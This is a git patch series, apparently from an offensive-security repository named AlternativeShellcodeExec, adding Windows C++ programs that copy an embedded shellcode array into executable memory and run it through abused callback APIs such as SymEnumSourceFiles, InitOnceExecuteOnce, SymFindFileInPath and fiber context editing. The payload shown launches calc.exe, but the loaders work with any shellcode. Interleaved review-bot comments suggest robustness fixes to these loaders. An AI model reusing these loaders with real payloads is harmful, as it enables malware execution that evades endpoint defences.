From 1800715fbdd3c54b5c55d4cb6d006bdc296c886b Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 21 Mar 2021 17:41:35 -0400 Subject: [PATCH 01/28] O_o --- AlternativeShellcodeExec.sln | 10 ++ SysEnumSourceFiles/SysEnumSourceFiles.cpp | 41 +++++ SysEnumSourceFiles/SysEnumSourceFiles.vcxproj | 147 ++++++++++++++++++ .../SysEnumSourceFiles.vcxproj.filters | 22 +++ 4 files changed, 220 insertions(+) create mode 100644 SysEnumSourceFiles/SysEnumSourceFiles.cpp create mode 100644 SysEnumSourceFiles/SysEnumSourceFiles.vcxproj create mode 100644 SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 71bc92d..a7896f3 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -43,6 +43,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SymEnumProcesses", "SymEnum EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumDirTreeW", "EnumDirTreeW\EnumDirTreeW.vcxproj", "{F22C852B-1CAA-4132-BDF3-F7AFAD1D65D2}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SysEnumSourceFiles", "SysEnumSourceFiles\SysEnumSourceFiles.vcxproj", "{0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -211,6 +213,14 @@ Global {F22C852B-1CAA-4132-BDF3-F7AFAD1D65D2}.Release|x64.Build.0 = Release|x64 {F22C852B-1CAA-4132-BDF3-F7AFAD1D65D2}.Release|x86.ActiveCfg = Release|Win32 {F22C852B-1CAA-4132-BDF3-F7AFAD1D65D2}.Release|x86.Build.0 = Release|Win32 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Debug|x64.ActiveCfg = Debug|x64 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Debug|x64.Build.0 = Debug|x64 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Debug|x86.ActiveCfg = Debug|Win32 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Debug|x86.Build.0 = Debug|Win32 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x64.ActiveCfg = Release|x64 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x64.Build.0 = Release|x64 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x86.ActiveCfg = Release|Win32 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/SysEnumSourceFiles/SysEnumSourceFiles.cpp b/SysEnumSourceFiles/SysEnumSourceFiles.cpp new file mode 100644 index 0000000..43acb2f --- /dev/null +++ b/SysEnumSourceFiles/SysEnumSourceFiles.cpp 
@@ -0,0 +1,41 @@
+#include
+#include
+
+// requires Dbghelp.lib
+#include
+#pragma comment(lib, "Dbghelp.lib")
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+int main() {
+
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ ::SymInitialize(::GetCurrentProcess(), NULL, TRUE);
+
+ ::SymEnumSourceFiles(::GetCurrentProcess(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACK)address, NULL);
+
+
+}
\ No newline at end of file
diff --git a/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj b/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj
new file mode 100644
index 0000000..8548bbc
--- /dev/null
+++ b/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj
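Review bot: `address` returned by VirtualAlloc is handed to memcpy and then cast to the callback pointer without a null check, so an allocation failure dereferences NULL at the memcpy line; add `if (address == NULL) return 1;` before the copy. The BOOL results of SymInitialize and SymEnumSourceFiles are discarded and `main` returns no value, so the process exit status says nothing about whether either call succeeded — capture them and return non-zero on failure. The same unchecked-VirtualAlloc pattern appears in InitOnceExecuteOnce.cpp, SymFindFileInPath.cpp and FlsAlloc.cpp in the following patches.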
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {0c660de2-1fac-4be7-a1ba-0ba0e96c1562} + SysEnumSourceFiles + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters b/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters new file mode 100644 index 0000000..6346f0d --- /dev/null +++ b/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 2acde74d69a56dd974d2b7f99047ad7f05d7d903 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Sat, 27 Mar 2021 14:45:05 -0400 Subject: [PATCH 02/28] Cache me outsaaaaaaid how bout that --- AlternativeShellcodeExec.sln | 20 +++ InitOnceExecuteOnce/InitOnceExecuteOnce.cpp | 41 +++++ .../InitOnceExecuteOnce.vcxproj | 147 ++++++++++++++++++ .../InitOnceExecuteOnce.vcxproj.filters | 22 +++ SymFindFileInPath/SymFindFileInPath.cpp | 50 ++++++ SymFindFileInPath/SymFindFileInPath.vcxproj | 147 ++++++++++++++++++ .../SymFindFileInPath.vcxproj.filters | 22 +++ 7 files changed, 449 insertions(+) create mode 100644 InitOnceExecuteOnce/InitOnceExecuteOnce.cpp create mode 100644 InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj create mode 100644 InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters create mode 100644 SymFindFileInPath/SymFindFileInPath.cpp create mode 100644 SymFindFileInPath/SymFindFileInPath.vcxproj create mode 100644 SymFindFileInPath/SymFindFileInPath.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index a7896f3..792921e 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -45,6 +45,10 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumDirTreeW", "EnumDirTree EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SysEnumSourceFiles", "SysEnumSourceFiles\SysEnumSourceFiles.vcxproj", "{0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SymFindFileInPath", "SymFindFileInPath\SymFindFileInPath.vcxproj", "{81376644-3F09-490E-963E-2266154C188E}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InitOnceExecuteOnce", "InitOnceExecuteOnce\InitOnceExecuteOnce.vcxproj", "{92EE01BF-6B18-44F2-AC69-29D9D7920D6E}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -221,6 +225,22 @@ Global {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x64.Build.0 = Release|x64 {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x86.ActiveCfg = Release|Win32 {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x86.Build.0 = Release|Win32 + {81376644-3F09-490E-963E-2266154C188E}.Debug|x64.ActiveCfg = Debug|x64 + {81376644-3F09-490E-963E-2266154C188E}.Debug|x64.Build.0 = Debug|x64 + {81376644-3F09-490E-963E-2266154C188E}.Debug|x86.ActiveCfg = Debug|Win32 + {81376644-3F09-490E-963E-2266154C188E}.Debug|x86.Build.0 = Debug|Win32 + {81376644-3F09-490E-963E-2266154C188E}.Release|x64.ActiveCfg = Release|x64 + {81376644-3F09-490E-963E-2266154C188E}.Release|x64.Build.0 = Release|x64 + {81376644-3F09-490E-963E-2266154C188E}.Release|x86.ActiveCfg = Release|Win32 + {81376644-3F09-490E-963E-2266154C188E}.Release|x86.Build.0 = Release|Win32 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Debug|x64.ActiveCfg = Debug|x64 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Debug|x64.Build.0 = Debug|x64 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Debug|x86.ActiveCfg = Debug|Win32 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Debug|x86.Build.0 = Debug|Win32 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x64.ActiveCfg = Release|x64 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x64.Build.0 = Release|x64 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x86.ActiveCfg = Release|Win32 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/InitOnceExecuteOnce/InitOnceExecuteOnce.cpp b/InitOnceExecuteOnce/InitOnceExecuteOnce.cpp new file mode 100644 index 0000000..e10e96e --- /dev/null +++ b/InitOnceExecuteOnce/InitOnceExecuteOnce.cpp 
@@ -0,0 +1,41 @@
+#include
+#include
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+int main() {
+
+ HANDLE hProcess = ::GetCurrentProcess();
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ PVOID lpContext;
+ BOOL bStatus;
+
+ INIT_ONCE g_InitOnce = INIT_ONCE_STATIC_INIT;
+
+ ::InitOnceExecuteOnce(&g_InitOnce, (PINIT_ONCE_FN)address, NULL, &lpContext);
+
+
+}
\ No newline at end of file
diff --git a/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj b/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj
new file mode 100644
index 0000000..0b098bd
--- /dev/null
+++ b/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj
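Review bot: `hProcess` and `bStatus` are declared in `main` and never used, and `lpContext` is written by the call but read by nothing afterwards; either drop the two unused locals or assign the InitOnceExecuteOnce result, `bStatus = ::InitOnceExecuteOnce(&g_InitOnce, (PINIT_ONCE_FN)address, NULL, &lpContext);`, and return non-zero when it is FALSE. The `g_` prefix on `g_InitOnce` reads as a global while it is a stack local; `INIT_ONCE initOnce = INIT_ONCE_STATIC_INIT;` matches its scope. The VirtualAlloc result is unchecked before memcpy, as already raised on SysEnumSourceFiles.cpp.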
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {92ee01bf-6b18-44f2-ac69-29d9d7920d6e} + InitOnceExecuteOnce + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters b/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters new file mode 100644 index 0000000..de6fc5a --- /dev/null +++ b/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/SymFindFileInPath/SymFindFileInPath.cpp b/SymFindFileInPath/SymFindFileInPath.cpp new file mode 100644 index 0000000..ac67f42 --- /dev/null +++ b/SymFindFileInPath/SymFindFileInPath.cpp 
@@ -0,0 +1,50 @@
+#include
+#include
+
+// requires Dbghelp.lib
+#include
+#pragma comment(lib, "Dbghelp.lib")
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+int main() {
+
+ HANDLE hProcess = ::GetCurrentProcess();
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ ::SymInitialize(hProcess, NULL, TRUE);
+
+ SYMSRV_INDEX_INFO finfo;
+ ::SymSrvGetFileIndexInfo("c:\\windows\\system32\\kernel32.dll", &finfo, NULL);
+
+ char dummy[MAX_PATH];
+
+
+ ::SymFindFileInPath(hProcess, "c:\\windows\\system32", "kernel32.dll", &finfo.timestamp, finfo.size, 0, SSRVOPT_DWORDPTR, dummy, (PFINDFILEINPATHCALLBACK)address, NULL);
+
+
+ return 0;
+
+}
\ No newline at end of file
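Review bot: `finfo` is declared uninitialized and the BOOL from SymSrvGetFileIndexInfo is ignored, so the `finfo.timestamp` and `finfo.size` fed to SymFindFileInPath two lines later may be stack garbage whenever that lookup fails; as far as I recall the dbghelp documentation also expects the `sizeofstruct` member to be set before the call, so `SYMSRV_INDEX_INFO finfo = {}; finfo.sizeofstruct = sizeof(finfo);` plus a check of the return value before continuing. `dummy` is the output buffer that receives the located file path, so a name such as `foundPath` and a one-line comment saying it is only there to satisfy the out-parameter would make the call readable. The SymInitialize and SymFindFileInPath results are discarded as well, although `main` here at least returns 0 explicitly.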
diff --git a/SymFindFileInPath/SymFindFileInPath.vcxproj b/SymFindFileInPath/SymFindFileInPath.vcxproj new file mode 100644 index 0000000..aa9b747 --- /dev/null +++ b/SymFindFileInPath/SymFindFileInPath.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {81376644-3f09-490e-963e-2266154c188e} + SymFindFileInPath + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SymFindFileInPath/SymFindFileInPath.vcxproj.filters b/SymFindFileInPath/SymFindFileInPath.vcxproj.filters new file mode 100644 index 0000000..39ac045 --- /dev/null +++ b/SymFindFileInPath/SymFindFileInPath.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 13768dde172ce24ce30a032ecc61d1cb1527083b Mon Sep 17 00:00:00 2001 
From: alfarom256 Date: Sat, 27 Mar 2021 15:09:16 -0400 Subject: [PATCH 03/28] Adding execution through Fiber Context editing. Not the same as CreateFiber(PtrToShellcode) --- AlternativeShellcodeExec.sln | 10 ++ FiberContextEdit/FiberContextEdit.vcxproj | 147 ++++++++++++++++++ .../FiberContextEdit.vcxproj.filters | 22 +++ FiberContextEdit/Source.cpp | 112 +++++++++++++ 4 files changed, 291 insertions(+) create mode 100644 FiberContextEdit/FiberContextEdit.vcxproj create mode 100644 FiberContextEdit/FiberContextEdit.vcxproj.filters create mode 100644 FiberContextEdit/Source.cpp diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 792921e..6b123db 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -49,6 +49,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SymFindFileInPath", "SymFin EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InitOnceExecuteOnce", "InitOnceExecuteOnce\InitOnceExecuteOnce.vcxproj", "{92EE01BF-6B18-44F2-AC69-29D9D7920D6E}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberContextEdit\FiberContextEdit.vcxproj", "{1E97F40F-E056-4468-94EA-15636B98B5D0}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -241,6 +243,14 @@ Global {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x64.Build.0 = Release|x64 {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x86.ActiveCfg = Release|Win32 {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x86.Build.0 = Release|Win32 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Debug|x64.ActiveCfg = Debug|x64 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Debug|x64.Build.0 = Debug|x64 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Debug|x86.ActiveCfg = Debug|Win32 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Debug|x86.Build.0 = Debug|Win32 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x64.ActiveCfg = Release|x64 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x64.Build.0 = Release|x64 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.ActiveCfg = Release|Win32 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/FiberContextEdit/FiberContextEdit.vcxproj b/FiberContextEdit/FiberContextEdit.vcxproj new file mode 100644 index 0000000..f670826 --- /dev/null +++ b/FiberContextEdit/FiberContextEdit.vcxproj 
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {1e97f40f-e056-4468-94ea-15636b98b5d0} + FiberContextEdit + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/FiberContextEdit/FiberContextEdit.vcxproj.filters b/FiberContextEdit/FiberContextEdit.vcxproj.filters new file mode 100644 index 0000000..3e7e62e --- /dev/null +++ b/FiberContextEdit/FiberContextEdit.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/FiberContextEdit/Source.cpp b/FiberContextEdit/Source.cpp new file mode 100644 index 0000000..07b5aa2 --- /dev/null +++ b/FiberContextEdit/Source.cpp 
@@ -0,0 +1,112 @@
+// alfarom256
+#include
+#include
+
+void dummy() {
+ puts("Hello Fiber from Dummy");
+}
+
+// calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
